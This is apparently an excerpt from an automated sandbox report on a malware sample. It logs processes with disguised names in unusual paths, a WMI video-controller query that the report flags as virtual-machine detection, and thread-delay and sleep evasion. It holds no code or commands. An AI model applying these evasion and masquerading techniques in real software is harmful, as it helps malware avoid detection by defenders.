            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeMemory allocated: C90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeMemory allocated: 1ABC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeMemory allocated: 1AEC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeMemory allocated: 17F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeMemory allocated: 1B460000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeMemory allocated: 8B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeMemory allocated: 1A550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeMemory allocated: 1530000 memory reserve | memory write watch
            Source: C:\Users\Public\AccountPictures\Registry.exeMemory allocated: 1AEA0000 memory reserve | memory write watch
            Source: C:\Users\Public\AccountPictures\Registry.exeMemory allocated: E60000 memory reserve | memory write watch
            Source: C:\Users\Public\AccountPictures\Registry.exeMemory allocated: 1AA00000 memory reserve | memory write watch
            Source: C:\Users\user\StartMenuExperienceHost.exeMemory allocated: D60000 memory reserve | memory write watch
            Source: C:\Users\user\StartMenuExperienceHost.exeMemory allocated: 1AAA0000 memory reserve | memory write watch
            Source: C:\Users\user\StartMenuExperienceHost.exeMemory allocated: 11F0000 memory reserve | memory write watch
            Source: C:\Users\user\StartMenuExperienceHost.exeMemory allocated: 1AF00000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeMemory allocated: 1620000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeMemory allocated: 1B310000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeMemory allocated: 10B0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeMemory allocated: 1AB70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 599687Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 599578Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 599468Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 599359Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\AccountPictures\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWindow / User API: threadDelayed 812Jump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWindow / User API: threadDelayed 1373Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWindow / User API: threadDelayed 745Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWindow / User API: threadDelayed 1551Jump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeWindow / User API: threadDelayed 367Jump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeWindow / User API: threadDelayed 365Jump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeWindow / User API: threadDelayed 367
            Source: C:\Users\Public\AccountPictures\Registry.exeWindow / User API: threadDelayed 366
            Source: C:\Users\user\StartMenuExperienceHost.exeWindow / User API: threadDelayed 367
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWindow / User API: threadDelayed 366
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWindow / User API: threadDelayed 369
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe TID: 2788Thread sleep count: 812 > 30Jump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe TID: 2788Thread sleep count: 1373 > 30Jump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe TID: 4440Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 6616Thread sleep count: 745 > 30Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 6616Thread sleep count: 1551 > 30Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7416Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7416Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7416Thread sleep time: -599687s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7416Thread sleep time: -599578s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7416Thread sleep time: -599468s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7416Thread sleep time: -599359s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7224Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 4396Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe TID: 764Thread sleep count: 367 > 30Jump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe TID: 6504Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe TID: 1120Thread sleep count: 365 > 30Jump to behavior
